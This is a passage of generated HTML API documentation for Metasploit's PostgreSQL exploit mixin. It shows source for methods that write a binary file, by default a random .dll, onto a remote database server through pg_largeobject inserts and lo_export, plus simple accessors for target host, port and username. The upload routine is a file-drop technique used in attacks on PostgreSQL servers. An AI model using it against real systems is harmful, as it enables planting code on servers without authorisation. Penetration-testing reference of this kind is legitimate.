<span class='id identifier rubyid_chunks'>chunks</span><span class='period'>.</span><span class='id identifier rubyid_each_with_index'>each_with_index</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_chunk'>chunk</span><span class='comma'>,</span> <span class='id identifier rubyid_pageno'>pageno</span><span class='op'>|</span>
<span class='id identifier rubyid_b64_data'>b64_data</span> <span class='op'>=</span> <span class='id identifier rubyid_postgres_base64_data'>postgres_base64_data</span><span class='lparen'>(</span><span class='id identifier rubyid_chunk'>chunk</span><span class='rparen'>)</span>
<span class='id identifier rubyid_insert'>insert</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>insert into pg_largeobject (loid,pageno,data) values(%d, %d, decode(&#39;%s&#39;, &#39;base64&#39;))</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_queries'>queries</span><span class='period'>.</span><span class='id identifier rubyid_push'>push</span><span class='lparen'>(</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_insert'>insert</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='op'>%</span><span class='lbracket'>[</span><span class='id identifier rubyid_oid'>oid</span><span class='comma'>,</span> <span class='id identifier rubyid_pageno'>pageno</span><span class='comma'>,</span> <span class='id identifier rubyid_b64_data'>b64_data</span><span class='rbracket'>]</span> <span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_queries'>queries</span><span class='period'>.</span><span class='id identifier rubyid_push'>push</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select lo_export(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_oid'>oid</span><span class='embexpr_end'>}</span><span class='tstring_content'>, &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_remote_fname'>remote_fname</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span>
<span class='comment'># Now run each of the queries we just built
</span> <span class='id identifier rubyid_queries'>queries</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_q'>q</span><span class='op'>|</span>
<span class='id identifier rubyid_resp'>resp</span> <span class='op'>=</span> <span class='id identifier rubyid_postgres_query'>postgres_query</span><span class='lparen'>(</span><span class='id identifier rubyid_q'>q</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_resp'>resp</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_resp'>resp</span><span class='lbracket'>[</span><span class='symbol'>:sql_error</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_print_error'>print_error</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Could not write the library to disk.</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_print_error'>print_error</span> <span class='id identifier rubyid_resp'>resp</span><span class='lbracket'>[</span><span class='symbol'>:sql_error</span><span class='rbracket'>]</span>
<span class='comment'># Can&#39;t really recover from this, bail
</span> <span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>return</span> <span class='id identifier rubyid_remote_fname'>remote_fname</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_upload_binary_file-instance_method">
#<strong>postgres_upload_binary_file</strong>(fname, remote_fname = nil) &#x21d2; <tt>nil</tt>, <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Uploads the given local file to the remote server</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>fname</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Name of a file on the local filesystem to be uploaded</p>
</div>
</li>
<li>
<span class='name'>remote_fname</span>
<span class='type'>(<tt>String</tt>)</span>
<em class="default">(defaults to: <tt>nil</tt>)</em>
&mdash;
<div class='inline'>
<p>Name of the file on the remote server where the data will be stored. Default is "&lt;random&gt;.dll"</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>if any part of this process failed</p>
</div>
</li>
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>if everything went as planned, the name of the file we dropped. This is really only useful if <code>remote_fname</code> is nil</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
410
411
412
413</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 410</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_upload_binary_file'>postgres_upload_binary_file</span><span class='lparen'>(</span><span class='id identifier rubyid_fname'>fname</span><span class='comma'>,</span> <span class='id identifier rubyid_remote_fname'>remote_fname</span><span class='op'>=</span><span class='kw'>nil</span><span class='rparen'>)</span>
<span class='id identifier rubyid_data'>data</span> <span class='op'>=</span> <span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_read'>read</span><span class='lparen'>(</span><span class='id identifier rubyid_fname'>fname</span><span class='comma'>,</span> <span class='label'>mode:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>rb</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_postgres_upload_binary_data'>postgres_upload_binary_data</span><span class='lparen'>(</span><span class='id identifier rubyid_data'>data</span><span class='comma'>,</span> <span class='id identifier rubyid_remote_fname'>remote_fname</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="rhost-instance_method">
#<strong>rhost</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Return the datastore value of the same name</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>IP address of the target</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
50</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 50</span>
<span class='kw'>def</span> <span class='id identifier rubyid_rhost'>rhost</span><span class='semicolon'>;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='semicolon'>;</span> <span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="rport-instance_method">
#<strong>rport</strong> &#x21d2; <tt>Integer</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Return the datastore value of the same name</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>TCP port where the target service is running</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
53</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 53</span>
<span class='kw'>def</span> <span class='id identifier rubyid_rport'>rport</span><span class='semicolon'>;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='semicolon'>;</span> <span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="username-instance_method">
#<strong>username</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Return the datastore value of the same name</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Username for authentication</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
56</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 56</span>
<span class='kw'>def</span> <span class='id identifier rubyid_username'>username</span><span class='semicolon'>;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>USERNAME</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='semicolon'>;</span> <span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="verbose-instance_method">
#<strong>verbose</strong> &#x21d2; <tt>Boolean</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Return the datastore value of the same name</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Boolean</tt>)</span>
&mdash;
<div class='inline'>
<p>Whether to print verbose output</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
65</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 65</span>
<span class='kw'>def</span> <span class='id identifier rubyid_verbose'>verbose</span><span class='semicolon'>;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>VERBOSE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='semicolon'>;</span> <span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:01:48 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue Copy Permalink